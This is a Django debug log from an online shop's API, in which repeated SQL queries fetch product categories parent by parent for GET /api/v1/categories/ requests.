2019-12-27 07:33:41,608 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:33:41,617 utils 32059 139875701085952 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:33:41,622 utils 32059 139875701085952 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) DEBUG 2019-12-27 07:33:41,626 utils 32059 139875690596096 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:33:41,633 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:33:41,637 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:33:41,640 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:33:41,643 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [27/Dec/2019 07:33:41] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:33:41,649 utils 32059 139875690596096 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:33:41,652 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:33:41,655 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:33:41,657 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:33:41,661 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:33:41,663 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:33:41,667 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:33:41,670 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:33:41,672 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:33:41,675 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:33:41,678 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:33:41,680 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:33:41,682 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:33:41,684 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:33:41,688 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:33:41,690 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:33:41,693 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:33:41,695 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:33:41,697 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:33:41,700 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:33:41,704 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:33:41,707 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:33:41,709 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:33:41,711 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:33:41,714 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:33:41,721 utils 32059 139875690596096 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:33:41,724 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:33:41,727 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:33:41,729 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:33:41,731 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:33:41,735 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:33:41,738 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:33:41,740 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:33:41,743 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:33:41,745 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:33:41,748 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:33:41,751 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:33:41,753 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:33:41,756 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:33:41,759 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:33:41,761 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:33:41] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-27 07:33:59,949 utils 32059 139875690596096 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:33:59,956 utils 32059 139875690596096 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:33:59,959 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:33:59,961 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:33:59,965 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:33:59,967 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:33:59,969 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:33:59,971 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:33:59,974 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:33:59,977 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:33:59,979 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:33:59,981 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:33:59,983 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:33:59,986 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:33:59,989 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:33:59,991 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:33:59,993 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:33:59,996 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:33:59,998 utils 32059 139875690596096 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 